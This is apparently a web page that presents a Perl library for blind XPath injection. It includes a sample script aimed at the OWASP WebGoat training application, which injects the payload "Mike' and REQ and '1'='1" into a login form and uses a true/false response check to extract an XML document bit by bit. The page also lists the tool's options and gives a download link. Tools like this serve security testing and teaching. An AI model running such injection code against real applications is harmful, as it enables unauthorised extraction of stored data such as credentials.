This is a library that let testing blind xpath injection on vulnerable applications.
This library allow to extract complete or portion of a XML document. You need to identify xPath injection and implement it inside
your own main code, in the callback_blind_xpath function.
This code will be call by library to extract each peace of bit of the XML document. A part of the xPath expression is provided as
an argument to the callback function, and must be merge to the xPath injection initial request.
The main code must be able to identify positive or negative response and return respectively 1 or 0 to library.
Samples of main code that connect to vulnerable application is provided (local, OWASP WebGoat 5.2).
Part of the sample main code for WebGoat
require("blind-xpath-lib.pm");
package BlindXPath;
sub init {
...
print "Webgoat initialization done\n\n";
}
sub verify_result {
my ($res) = (@_);
return 1 if ($res =~ /11123/);
return 0;
}
sub callback_blind_xpath
{
my ($arg) = @_;
my $username = "Mike' and REQ and '1'='1";
my $password = "test123";
$username =~ s/REQ/$arg/;
my $req = new HTTP::Request POST => "$URL?$xpathURL";
$req->content_type('application/x-www-form-urlencoded');
$req->content("Username=$username&Password=$password&SUBMIT=Submit");
my $res = $ua->request($req);
if (! $res->is_success) {
print "Error : Unable to connect to WebGoat ($URL)\n";
exit(1)
}
my $verify = verify_result($res->content);
return $verify;
}
init();
blind_xpath_start();
The library allow to specify options, to limit the field of injection. You can exclude some
parts of XML document, limit depth of extraction, or start extraction from a specified node.
By default, all parts of XML document, starting from the root, and following each child node will be retreive.
Don't forget that bit to bit extraction is request intensive, and excluding some parts of XML
could significaly reduce number of requests sent to server.
blind-xpath-lib.pm [v1.0] Options -c (Do not retreive comments) -t (Do not retreive texts) -p (Do not retreive processing instructions) -a (Do not retreive argument's names) -A (Do not retreive argument's values) -n (Do not retreive node's names) -d <0-n> (depth of XML analyse. Default:0 (=infinite) ) -s xpath (define the starting node. Default : /node() ) -o file (Write output into file. Default : stdout ) -D (debug mode) -h (help)
Download blind-xpath-injection-1.0.tgz